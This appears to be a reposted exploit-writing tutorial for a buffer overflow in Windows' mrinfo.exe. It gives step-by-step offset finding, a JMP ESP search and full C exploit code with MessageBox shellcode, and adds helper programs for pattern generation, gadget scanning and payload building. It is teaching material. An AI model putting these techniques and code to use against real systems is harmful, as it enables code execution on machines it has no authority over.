This is a tutorial about writing an exploit. We will use the Mrinfo.exe buffer overflow as our example. A nice paper for noobs, step by step with pictures. Source: coromputer.net

Tools:
– Debugger; we use OllyDbg but any other will do.
– WinHex
– Compiler

##################################################################

To begin, we have to find information about the hole we want to exploit. Here we will use a simple hole in Mrinfo. The first thing to do is to find out how to trigger the buffer overflow on our machine. Most of the time that means finding the advisory, on k-otik or packetstormsecurity for example. In our case we can read in the advisory: “Mrinfo.exe is a tool used for multicast routing. There is a buffer overflow hole in Mrinfo.exe; the bug seems to be bad handling of the “-i” and “-n” settings, which badly manage values longer than 53 characters.” So we have to start mrinfo.exe with -i [53 chars] (without the “[]”, of course) to reproduce the bug.
So we have reproduced the bug, but we don't yet know whether we can do anything with it. To find out, we will check whether we can overwrite EIP or not. I will show how to do that with OllyDbg, but it can also be done with Visual Studio. First we have to choose which program to debug; here, of course, it is mrinfo.exe. File -> Open (or F3), go to the system32 directory and set -i [60A] as the argument, a little more than the length given in the advisory, because our goal is not only to crash the program but also to overwrite EIP. The program is now loaded but not yet running; press F9 (or the blue arrow in the toolbar) to run it.
EIP is now 41414141 (41 is the hex value of ‘A’ in ASCII), and we can also see part of our buffer directly at ESP. Our next goal is to learn the exact position of the characters that overwrite EIP, and the only way to find that is to try. So we start with something like mrinfo.exe -i [55A][10B] (always inside the debugger, of course). EIP becomes 42424242 (BBBB), so our RET lies somewhere between characters 55 and 65. Next we try mrinfo.exe -i [55A]ZZZZ[6B], and EIP becomes 425A5A5A (BZZZ): one B too many went into the return address. Remember that x86 is little-endian, so the last byte of the overwrite shows up as the high byte of EIP. The characters of RET are therefore 57, 58, 59 and 60, and we now know our buffer will look like [56A][RET]… We still have to find where the beginning of our shellcode should go, and then we will have the complete structure of our buffer. That is not too hard: we use the same trick we used to find the position of RET. So we start mrinfo.exe with -i [56A][ZZZZ][BCDEFGHIJKLMNOPQRSTUVWXY] as the argument and look at what ESP points to.
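The trial-and-error above (A's, then B's, then ZZZZ) works, but the usual way to get the overwrite offset in a single run is a cyclic pattern in which no 4-byte window repeats. The following C program is an added example and is not part of the original tutorial: it generates such a pattern (the same Aa0Aa1… scheme Metasploit's pattern_create uses), maps an EIP value read from the debugger back to its offset, and also reproduces the little-endian reading of the [55A]ZZZZ[6B] experiment. All buffers and EIP values are constructed inline; nothing here runs mrinfo.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Fill out[] with the Aa0Aa1...Aa9Ab0... pattern (up to len bytes) and
 * return the number of bytes written. No 4-byte window repeats within one
 * period of 26*26*10*3 = 20280 bytes, so an EIP value maps to one offset. */
size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                const char trip[3] = { u, l, d };
                for (int k = 0; k < 3 && n < len; k++)
                    out[n++] = trip[k];
            }
    return n;
}

/* Read 4 bytes of a buffer the way the CPU reads a saved return address:
 * the byte at ret_off becomes the least significant byte of EIP. */
uint32_t eip_from_buffer(const char *buf, size_t len, size_t ret_off)
{
    if (ret_off + 4 > len)
        return 0;
    uint32_t eip = 0;
    for (int i = 0; i < 4; i++)
        eip |= (uint32_t)(uint8_t)buf[ret_off + i] << (8 * i);
    return eip;
}

/* Given the EIP value the debugger showed after sending the pattern,
 * return the offset of the 4 overwriting bytes, or -1 if not found. */
long pattern_offset(const char *pat, size_t len, uint32_t eip)
{
    char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (char)(eip >> (8 * i));     /* little-endian bytes of EIP */
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

int main(void)
{
    /* 1. The tutorial's experiment: [55A]ZZZZ[6B] (constructed here) overwrites
     *    bytes 56..59 counted from 0, i.e. characters 57..60 counted from 1. */
    char probe[65];
    memset(probe, 'A', 55);
    memcpy(probe + 55, "ZZZZ", 4);
    memset(probe + 59, 'B', 6);
    printf("EIP from [55A]ZZZZ[6B] = %08x\n",
           eip_from_buffer(probe, sizeof probe, 56));          /* 425a5a5a */

    /* 2. The same answer in one run with a cyclic pattern. */
    char pat[100];
    size_t n = pattern_create(pat, sizeof pat);
    uint32_t crash_eip = eip_from_buffer(pat, n, 56);         /* what OllyDbg would show */
    printf("EIP = %08x -> offset %ld\n",
           crash_eip, pattern_offset(pat, n, crash_eip));      /* 39624138 -> 56 */
    return 0;
}
```

To use it against the real target, send the output of pattern_create as the -i argument, read EIP from the debugger after the crash and feed it to pattern_offset; the result is the number of filler bytes before RET (56 here), which also tells you where the bytes that land at ESP begin.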
In our case we are lucky: in that last run ESP points right after our RET. That is not always the case, but if we have enough room we can also skip this step and simply put NOPs in our buffer after the RET and before the shellcode. So now we know how to crash the program, that we can easily place our shellcode at ESP, and the position of our RET and of the shellcode in the buffer. It's time to code! What does our exploit have to do? It has to build a buffer with our shellcode and our RET, then run mrinfo with -i and that buffer as argument; for that we will build the command line with sprintf() and execute it with system(). And the buffer? It needs a RET and a shellcode; we start with the RET. We saw above that our shellcode ends up at ESP, so the best way to build the exploit is to make EIP point to a JMP ESP or a CALL ESP. As you surely know, our RET sits in the middle of our buffer, which is a C string, so it cannot contain NULL (0x00) bytes. We just have to find a JMP ESP at an address that does not look like 00XXXXXX. We will use WinHex to read the RAM. So start mrinfo.exe in the debugger, then in WinHex open the process memory: Tools -> RAM editor, select mrinfo and open the entire memory. Unfortunately the addresses there look like 00XXXXXX, so we cannot pick a JMP ESP from the executable itself. Still in Tools -> RAM editor we can see that mrinfo has loaded a lot of system DLLs, and those are mapped at addresses like 77XXXXXX, which suits us. So open msvcrt.dll, for example.
In msvcrt.dll the addresses look like 77XXXXXX; now we have to check whether it contains a JMP ESP. The opcode bytes of JMP ESP are 0xFF 0xE4. We search msvcrt.dll in WinHex with Search -> Find Hex Value for FFE4. Unfortunately there is none in msvcrt.dll. We could search for FFD4 (CALL ESP) instead, but let us try another DLL, ntdll.dll for example, and search again.
Oh! We have a JMP ESP in ntdll.dll at address 77F4801C. Unfortunately this address changes from one version of Windows and service pack to another, but our exploit is local, so we can simply ask our program to find it at run time! For that we just do offset = LoadLibrary("ntdll.dll") to get the base address of the DLL, and then scan it with a loop:

    while(!end) {
        if(((BYTE *)offset)[i] == ff && ((BYTE *)offset)[i+1] == e4) {
            sprintf(ret, "%x", &((BYTE *)offset)[i]);
            end = TRUE;
        }
        i++;
    }

This loop searches for FF E4 (the opcodes of JMP ESP) in the library and writes the address into ret. But we cannot put ret into our buffer like that: sprintf("%x") gave us the address as 8 hex characters, and we need its 4 raw bytes, so we convert them back:

    for(y=0;y<10;y++) {
        nret[y] = ret[y]-48;               /* '0'..'9' -> 0..9 */
        if(nret[y]>10) {                   /* 'a'..'f' -> 10..15 */
            switch((nret[y]-33)) {
                case 16: nret[y]=0x0a; break;
                case 17: nret[y]=0x0b; break;
                case 18: nret[y]=0x0c; break;
                case 19: nret[y]=0x0d; break;
                case 20: nret[y]=0x0e; break;
                case 21: nret[y]=0x0f; break;
            }
        }
    }
    memset(ret, 0, sizeof(ret));
    ret[0] = nret[0]*0x10 + nret[1];
    ret[1] = nret[2]*0x10 + nret[3];
    ret[2] = nret[4]*0x10 + nret[5];
    ret[3] = nret[6]*0x10 + nret[7];

So the question of RET is answered. The shellcode is left; for our example we will use a small, simple shellcode that pops up a MessageBox.

    char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* 17 NOPs */
        "\x33\xc9"              /* xor ecx, ecx */
        "\x51"                  /* push ecx (x4: four NULL arguments) */
        "\x51"
        "\x51"
        "\x51"
        "\xb8\xd7\xad\xd3\x77"  /* mov eax, 0x77d3add7 (presumably MessageBox on the author's Win2k) */
        "\xff\xd0"              /* call eax */
        "\xff\x57\xe8";         /* call dword ptr [edi-0x18] */

There are some NOPs in front to make it more portable, in case ESP does not point at the very beginning of the shellcode but a few bytes further on. Now we build the buffer that we will pass to system(). It has to look like « mrinfo.exe -i [56A][RET][SC] », so:

    sprintf(buffer, "mrinfo -i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%s",
            ret[3], ret[2], ret[1], ret[0], shellcode);

Note the order of ret[3] … ret[0]: the address is written least significant byte first because x86 is little-endian. Then give it to system():

    system(buffer);

That's it; our exploit now works on Win2k.
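The scan above starts at the DLL base with no end condition, accepts only a bare FF E4, and round-trips the address through sprintf("%x") to recover its bytes. As an added example (not the tutorial's code), here is a portable C version of the same idea: it searches a byte image for any of JMP ESP, CALL ESP or PUSH ESP; RET, stays within the given length, rejects addresses containing bytes that cannot survive the trip through a C string and a cmd.exe argument, and packs the result little-endian straight into the payload. The 64-byte image and the base 0x77F48000 are constructed for the example; on Windows you would pass the bytes and base of a loaded module (e.g. from LoadLibrary) instead. The bad-byte set is an assumption: 0x00 ends the C string, 0x0A and 0x0D end the command line, and 0x20 and 0x22 break argument splitting.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Two-byte sequences that hand control to whatever ESP points at. */
static const struct { const char *name; uint8_t op[2]; } GADGETS[] = {
    { "jmp esp",       { 0xff, 0xe4 } },
    { "call esp",      { 0xff, 0xd4 } },
    { "push esp; ret", { 0x54, 0xc3 } },
};

/* Assumed bad bytes for this target: 0x00 terminates the string handed to
 * system(), 0x0a/0x0d end the command line, 0x20 splits the argument and
 * 0x22 is the quote character. Adjust per target. */
static const uint8_t BAD_BYTES[] = { 0x00, 0x0a, 0x0d, 0x20, 0x22 };

/* 1 if none of the four bytes of addr is in BAD_BYTES. */
int addr_is_clean(uint32_t addr)
{
    for (int i = 0; i < 4; i++) {
        uint8_t b = (uint8_t)(addr >> (8 * i));
        for (size_t j = 0; j < sizeof BAD_BYTES; j++)
            if (b == BAD_BYTES[j])
                return 0;
    }
    return 1;
}

/* Scan `len` bytes of an image mapped at `base` and return the first gadget
 * whose address is clean, or 0 if there is none. `which`, if non-NULL,
 * receives the gadget's name. */
uint32_t find_esp_gadget(const uint8_t *image, size_t len, uint32_t base,
                         const char **which)
{
    for (size_t i = 0; i + 1 < len; i++) {
        for (size_t g = 0; g < sizeof GADGETS / sizeof GADGETS[0]; g++) {
            if (image[i] != GADGETS[g].op[0] || image[i + 1] != GADGETS[g].op[1])
                continue;
            uint32_t addr = base + (uint32_t)i;
            if (!addr_is_clean(addr))
                break;              /* right bytes, unusable address: keep scanning */
            if (which)
                *which = GADGETS[g].name;
            return addr;
        }
    }
    return 0;
}

/* Write [pad x 'A'][ret, little-endian][shellcode] into out.
 * Returns the payload length, or -1 if it would not fit. */
int build_payload(uint8_t *out, size_t outlen, size_t pad, uint32_t ret,
                  const uint8_t *sc, size_t sclen)
{
    if (pad + 4 + sclen > outlen)
        return -1;
    memset(out, 'A', pad);
    for (int i = 0; i < 4; i++)                 /* LSB first: x86 is little-endian */
        out[pad + i] = (uint8_t)(ret >> (8 * i));
    memcpy(out + pad + 4, sc, sclen);
    return (int)(pad + 4 + sclen);
}

/* Constructed 64-byte "module". With base 0x77F48000 the FF E4 at 0x0a and
 * the FF D4 at 0x20 both sit at addresses containing a bad byte (0x0a, 0x20);
 * the FF E4 at 0x30 is the one we want. All other bytes are zero. */
static const uint8_t SAMPLE_IMAGE[0x40] = {
    [0x0a] = 0xff, [0x0b] = 0xe4,
    [0x20] = 0xff, [0x21] = 0xd4,
    [0x30] = 0xff, [0x31] = 0xe4,
};
#define SAMPLE_BASE 0x77F48000u

int main(void)
{
    const char *which = NULL;
    uint32_t ret = find_esp_gadget(SAMPLE_IMAGE, sizeof SAMPLE_IMAGE, SAMPLE_BASE, &which);
    if (!ret) {
        puts("no usable gadget");
        return 1;
    }
    printf("%s at 0x%08x\n", which, ret);           /* jmp esp at 0x77f48030 */

    static const uint8_t sc[] = { 0x90, 0x90, 0xcc }; /* placeholder: 2 NOPs + int3 */
    uint8_t payload[128];
    int n = build_payload(payload, sizeof payload, 56, ret, sc, sizeof sc);
    for (int i = 52; i < n; i++)
        printf("%02x ", payload[i]);                /* ... 41 41 41 41 30 80 f4 77 90 90 cc */
    putchar('\n');
    return 0;
}
```

The payload still has to be turned into a command line as the tutorial does with sprintf(); what this version adds is that a candidate whose address would be mangled on the way (the 0x0A and 0x20 cases above) is skipped instead of silently producing a corrupted RET, and that a hit near the end of the image cannot read past it.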
On WinXP there is an access violation, but that is not important because our only goal was to write an exploit. When mrinfo.exe crashes on WinXP, choose Debug and then Continue.
And ! ! !
This is the message box from our shellcode: mrinfo.exe has executed our code.

##################################################################

This tutorial is the image of the one who wrote it, imperfect, so don't hesitate to contact me at scurt@coromputer.net if you notice an error or have a comment. You will find an improved version of the exploit, with a shellcode that pops a shell, on our site: http://www.coromputer.net/files/mrinfo2k.c

Special thanks to the Coromputer team and special greets to Decryptus, Mik_ and kralor, without whom none of this would have been possible. Find us on www.coromputer.net or on IRC, #coromputer @ undernet.

##################################################################

// The full code used in this text:

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <conio.h>

    int main()
    {
        int offset;
        BYTE ff = 0xff;
        BYTE e4 = 0xe4;
        BOOL end = FALSE;
        char ret[10] = {0};
        int nret[10] = {0};
        int i = 0;
        int y = 0;
        char buffer[128];
        /* this shellcode just pops up a new blank MessageBox: 33 chars */
        char shellcode[] =
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* 17 NOPs */
            "\x33\xc9"              /* xor ecx, ecx */
            "\x51"                  /* push ecx (x4: four NULL arguments) */
            "\x51"
            "\x51"
            "\x51"
            "\xb8\xd7\xad\xd3\x77"  /* mov eax, 0x77d3add7 (presumably MessageBox on the author's Win2k) */
            "\xff\xd0"              /* call eax */
            "\xff\x57\xe8";         /* call dword ptr [edi-0x18] */
        /* 56 chars before the ret */

        offset = (int)LoadLibrary("ntdll.dll");   /* base address of ntdll.dll in our own process */

        /* scan the DLL for FF E4 (JMP ESP) and keep its address as hex text */
        while(!end) {
            if(((BYTE *)offset)[i] == ff && ((BYTE *)offset)[i+1] == e4) {
                printf("%x\n", &((BYTE *)offset)[i]);
                sprintf(ret, "%x", &((BYTE *)offset)[i]);
                end = TRUE;
            }
            i++;
        }

        /* turn the 8 hex chars back into 4 raw bytes */
        for(y=0;y<10;y++) {
            nret[y] = ret[y]-48;               /* '0'..'9' -> 0..9 */
            if(nret[y]>10) {                   /* 'a'..'f' -> 10..15 */
                switch((nret[y]-33)) {
                    case 16: nret[y]=0x0a; break;
                    case 17: nret[y]=0x0b; break;
                    case 18: nret[y]=0x0c; break;
                    case 19: nret[y]=0x0d; break;
                    case 20: nret[y]=0x0e; break;
                    case 21: nret[y]=0x0f; break;
                }
            }
        }
        memset(ret, 0, sizeof(ret));
        ret[0] = nret[0]*0x10 + nret[1];
        ret[1] = nret[2]*0x10 + nret[3];
        ret[2] = nret[4]*0x10 + nret[5];
        ret[3] = nret[6]*0x10 + nret[7];

        /* [56A][RET, least significant byte first][shellcode] */
        sprintf(buffer, "mrinfo -i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%s",
                ret[3], ret[2], ret[1], ret[0], shellcode);
        system(buffer);
        getch();
        return 0;
    }

Source :
coromputer.net
January 29, 2007 at 8:12 pm |
I was trying to exploit this bug on XP SP2 and it's a real PITA.
Didn't succeed… I think the XP SP2 binaries are compiled with the /SafeSEH switch. Works like a charm on Windows 2000…
January 30, 2007 at 3:12 pm |
I just posted it for beginners.
February 7, 2007 at 6:15 am |
SP2 is more secure than Vista currently. Geez, what a rush job by m$.